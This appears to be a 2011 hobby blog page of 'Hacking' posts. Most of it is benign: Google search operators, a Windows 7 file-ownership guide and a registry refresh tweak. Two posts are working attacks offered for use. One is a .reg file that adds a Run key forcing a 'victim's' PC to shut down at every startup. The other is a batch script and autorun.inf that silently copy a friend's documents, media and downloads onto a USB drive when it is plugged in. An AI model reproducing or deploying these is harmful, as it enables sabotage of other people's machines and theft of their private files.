Pages

Braniac Bhai Headline Animator

Search This Blog

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Jun 10, 2011

Google Hack For Making Special Advanced Search

Google Hack For Making Special Advanced Search


Google is considered as the Big Daddy of Internet. Most of the people prefer using google over other search engines like Yahoo, askjeeves, Bing etc due the highly relevant results of google. Now what to do when even google is not providing you with what you want..

certainly you will feel that you have reached the end and there is no way that you can get the type of result you want. But wait Dont loose your hope because now we will be telling you some google hacks that will help you get your desired result. You will find these hacks very useful in your day to day life and you can also amuse your friends by telling these google hacks and certainly they will be amazed by knowledge.


Now Here Are The List Of Google Hacks With Their Usability

Type these searches in google
  • link:url
This will give the list of sites that links to a particular site.
Example:

link:www.download.com

It will give the list of all sites linking to www.download.com
  • related:url
This search will give you all sites related to the url you have entered in the above query.
  • site:domain
This will show all the pages of the Domain you enter in the above query
  • allinurl:search term
This will show only those results in whose url your search term will appear exactly.
  • Inurl:search term
This is similar to the query allinurl but it will search only the first word of search term in url and the rest of the words will be searched in the page.
  • allintitle:search term
This will show only those sites which have your search term in the tittle of website.
  • Intitle:search term
This will show only those sites which have your first word of search term in tittle and the rest of the words in their page.
  • spell:search term
This will check your search term for spelling mistakes and automatically perform search in google with correct words
  • stocks:search term
This will show all the results with your your query in the stock index
  • filetype:extension  search term
This is one of the most useful queries.It will provide you only those sites which provides a document of your extension type and having your search term in it.

Example:

Filetype:doc mother

It will show all doc files in which the mother word is used. This type of search is extremely useful for finding presentations(ppt or pptx) and e books(pdf).
  • phone:number
This search query will show you the name and address of the number you have entered in the above search.

May 23, 2011

How to Take Ownership & Grant Permissions to Access Files & Folder in Windows 7

How to Take Ownership & Grant Permissions to Access Files & Folder in Windows 7



If you are windows vista user then you will be knowing the file ownership and permissions related issues and now it is extended to windows 7 too, but Windows XP users experimenting with Windows 7 might not know about this.
Windows 7 has implemented addition security mechanism to prevent accidental or intentional file or folder modification by not allowing users other then owner of file or folder to access it. Hence incase if you need to access, modify or delete such files or folder you need to take ownership first then assign rights or permission to respective users. Here is Guide on How to take Ownership and Grant Permission in Window 7.
How to Take Ownership in Windows 7
1. Locate the file or folder on which you want to take ownership in windows explorer
2. Right click on file or folder and select “Properties” from Context Menu
3. Click on Security tab
4. Click on “Advance”
5. Now click on Owner tab in Advance Security Settings for User windows
6. Click on Edit Button and select user from given Change Owner to list if user or group is not in given list then click on other users or groups. Enter name of user/group and click ok.
8. Now select User/group and click apply and ok. (Check “Replace owner on subcontainers and objects” if you have files and folder within selected folder)
9. Click ok when Windows Security Prompt is displayed
10. Now Owner name must have changed.
11. Now click Ok to exist from Properties windows
Once you have taken the ownership of file or folder next part comes is Granting Permissions to that file/folder or object.
How to Grant Permissions in Windows 7
1. Locate the file or folder on which you want to take ownership in windows explorer
2. Right click on file or folder and select “Properties” from Context Menu
3. Click on Edit button in Properties windows Click ok to confirm UAC elevation request.
4. Select user/group from permission windows or click add to add other user or group.
5. Now under Permission section check the rights which you want to grant i.e check “Full Control” under the “Allow” column to assign full access rights control permissions to Administrators group.
6. Click Ok for changes to take effect and click ok final ok to exit from Properties window.
Now you can access files of folder in windows 7 with full permissions and take full control. Here is another simplest method to take ownership, Method to Add Take ownership Option in Right Click Menu.

May 18, 2011

Shutdown your friend's computer everytime it start

Shutdown your friend's computer everytime it start


put this followin text in a .reg file and run it in the victims pc:


Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W
indows\CurrentVersion\Run]
"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"



DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.

You can also put this in a javascript code, just add this code to your webpage:



Be careful, a drawback of the js code is that NORTON ANTIVIRUS's script blocking feature may block this.

well i am also trying to find the method which executes without any drawbacks. So if u have one, pls post it here.

ENJOY !!!

STEAL FILES FROM OTHER PC VIA USB

STEAL FILES FROM OTHER PC VIA USB

undefined

Here is something illegal but only for educational propose. This only demonstrates how you can copy files from your friend’s PC as soon as you plug in your flash drive or any removable storage media. How you can do this from batch file with the help of autorun.inf file?

When you plug in your Pen drive, system will look up for autorun.inf (incase if auto run is not disabled for your drive from the system).

Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration batch file is copying only the files and folders in My Documents.
undefined

Here goes the batch code:

@echo off
:CHECK
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR

:COPIER
if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit
:ERROR
exit

What it actually does is in first case, CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’t have then it creates one by using MD (Make Directory) command. Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Otherwise it will return an error and exits.

This happens because; in Windows XP the user’s documents are usually stored in %systemroot%\Documents and Settings folder. Now I’ve defined another two cases after the first case CHECK, that is COPIER case and ERROR case.

Case COPIER will execute when the program recognizes it is Windows XP, where the real copying work going on. Case ERROR will execute when the Documents and Settings, if doesn’t exists in your system root. This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.

Now let’s create a file that will load it automatically.

[autorun]
Open=Filename.bat
Action=File Copier

The above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf. Copy the two files, autorun.inf and Filename.bat in your flash drive.

Auto Window Refresh

Auto Window Refresh

Whenever you make a change to your windows you have to press F5 or do a manual refresh.
With this tweak you can tell windows to increase the rate at which it does the refreshing.
Navigate to the key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Update. Create a newDWORD value, or modify the existing value, named UpdateMode and set it to equal "0" for faster updates. Restart Windows for the change to take effect